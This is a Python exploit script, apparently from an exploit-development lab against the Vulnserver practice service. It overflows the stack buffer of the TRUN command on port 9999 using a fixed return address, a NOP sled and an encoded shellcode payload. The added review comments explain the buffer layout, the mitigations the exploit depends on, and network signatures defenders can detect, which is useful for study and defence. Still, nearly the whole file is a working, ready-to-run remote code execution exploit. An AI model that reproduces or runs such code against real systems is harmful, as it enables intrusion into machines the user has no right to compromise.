6-exploit.py
#!/usr/bin/python3
import socket
import sys
# Build the single request body that the network code below sends after the
# "TRUN /.:/" prefix.
#
# NOTE(review): the two names are swapped relative to what they hold.
#   * `bof` is the encoded machine-code payload, not the overflow padding.
#   * `shellcode` is the complete overflow buffer (padding + address + payload).
#
# `bof`: opaque, encoded x86 bytes. The opening sequence (\xd9\xd0 ...
# \xd9\x74\x24\xf4 \x58 \x31\xc9 \xb1\x52) is consistent with the FPU-based
# "get program counter" decoder stub emitted by common payload encoders
# (presumably msfvenom's shikata_ga_nai; confirm against the generator used).
# Because the body is encoded, what it does after decoding cannot be read off
# this listing. For defenders, that fnstenv/pop stub is a widely used static
# signature for network and endpoint detection.
bof = (b"\xd9\xd0\xba\xf2\xd6\xf7\x63\xd9\x74\x24\xf4\x58\x31\xc9"
b"\xb1\x52\x31\x50\x17\x83\xc0\x04\x03\xa2\xc5\x15\x96\xbe"
b"\x02\x5b\x59\x3e\xd3\x3c\xd3\xdb\xe2\x7c\x87\xa8\x55\x4d"
b"\xc3\xfc\x59\x26\x81\x14\xe9\x4a\x0e\x1b\x5a\xe0\x68\x12"
b"\x5b\x59\x48\x35\xdf\xa0\x9d\x95\xde\x6a\xd0\xd4\x27\x96"
b"\x19\x84\xf0\xdc\x8c\x38\x74\xa8\x0c\xb3\xc6\x3c\x15\x20"
b"\x9e\x3f\x34\xf7\x94\x19\x96\xf6\x79\x12\x9f\xe0\x9e\x1f"
b"\x69\x9b\x55\xeb\x68\x4d\xa4\x14\xc6\xb0\x08\xe7\x16\xf5"
b"\xaf\x18\x6d\x0f\xcc\xa5\x76\xd4\xae\x71\xf2\xce\x09\xf1"
b"\xa4\x2a\xab\xd6\x33\xb9\xa7\x93\x30\xe5\xab\x22\x94\x9e"
b"\xd0\xaf\x1b\x70\x51\xeb\x3f\x54\x39\xaf\x5e\xcd\xe7\x1e"
b"\x5e\x0d\x48\xfe\xfa\x46\x65\xeb\x76\x05\xe2\xd8\xba\xb5"
b"\xf2\x76\xcc\xc6\xc0\xd9\x66\x40\x69\x91\xa0\x97\x8e\x88"
b"\x15\x07\x71\x33\x66\x0e\xb6\x67\x36\x38\x1f\x08\xdd\xb8"
b"\xa0\xdd\x72\xe8\x0e\x8e\x32\x58\xef\x7e\xdb\xb2\xe0\xa1"
b"\xfb\xbd\x2a\xca\x96\x44\xbd\x59\x7f\x95\x5b\xca\x82\x19"
b"\xa0\xd8\x0a\xff\xc2\xcc\x5a\xa8\x7a\x74\xc7\x22\x1a\x79"
b"\xdd\x4f\x1c\xf1\xd2\xb0\xd3\xf2\x9f\xa2\x84\xf2\xd5\x98"
b"\x03\x0c\xc0\xb4\xc8\x9f\x8f\x44\x86\x83\x07\x13\xcf\x72"
b"\x5e\xf1\xfd\x2d\xc8\xe7\xff\xa8\x33\xa3\xdb\x08\xbd\x2a"
b"\xa9\x35\x99\x3c\x77\xb5\xa5\x68\x27\xe0\x73\xc6\x81\x5a"
b"\x32\xb0\x5b\x30\x9c\x54\x1d\x7a\x1f\x22\x22\x57\xe9\xca"
b"\x93\x0e\xac\xf5\x1c\xc7\x38\x8e\x40\x77\xc6\x45\xc1\x97"
b"\x25\x4f\x3c\x30\xf0\x1a\xfd\x5d\x03\xf1\xc2\x5b\x80\xf3"
b"\xba\x9f\x98\x76\xbe\xe4\x1e\x6b\xb2\x75\xcb\x8b\x61\x75"
b"\xde")
# Full buffer layout, in order:
#   2003 x b"A"         filler up to the overwritten control data
#   b"\xaf\x11\x50\x62" four bytes, i.e. 0x625011af when read little-endian;
#                       presumably replaces a saved return address (confirm
#                       against the target binary)
#   32 x b"\x90"        x86 NOP padding in front of the payload
#   bof                 the encoded payload defined above
# The layout relies on a hard-coded address and on executing bytes placed on
# the stack, so it only works where the target module is not rebased (no
# ASLR), the stack is executable (no DEP/NX) and no stack cookie guards the
# overwritten frame. Those are the mitigations to verify on the defended side.
shellcode = b"A" * 2003 + b"\xaf\x11\x50\x62" + b"\x90" * 32 + bof
# Send the prepared buffer to the service in a single TCP connection.
#
# Observable behaviour, useful for detection: one connection to TCP port 9999
# whose first bytes are the literal "TRUN /.:/" followed by a run of 2003 "A"
# bytes. A request of that shape and length is a straightforward network
# signature.
#
# NOTE(review): the listing lost its indentation; the block structure below
# is the presumed original (sys.exit() inside the handler). Placing it after
# the try/except instead would not change what the script does.
try:
    ip_address = input("Enter the server IP address: ")
    target = (ip_address, 9999)

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(target)

    request = b'TRUN /.:/' + shellcode
    s.send(request)

    # The message says "Fuzzing", but a fixed, prebuilt buffer is sent; the
    # wording is kept as the script emits it.
    sent_size = len(shellcode)
    print("Fuzzing with TRUN command with %s bytes" % sent_size)
    s.close()
except Exception as e:
    # Every failure (bad address, refused connection, send error) is reported
    # as a connection error, and sys.exit() without an argument exits with
    # status 0. The socket is not closed on this path.
    print("Error connecting to server:", e)
    sys.exit()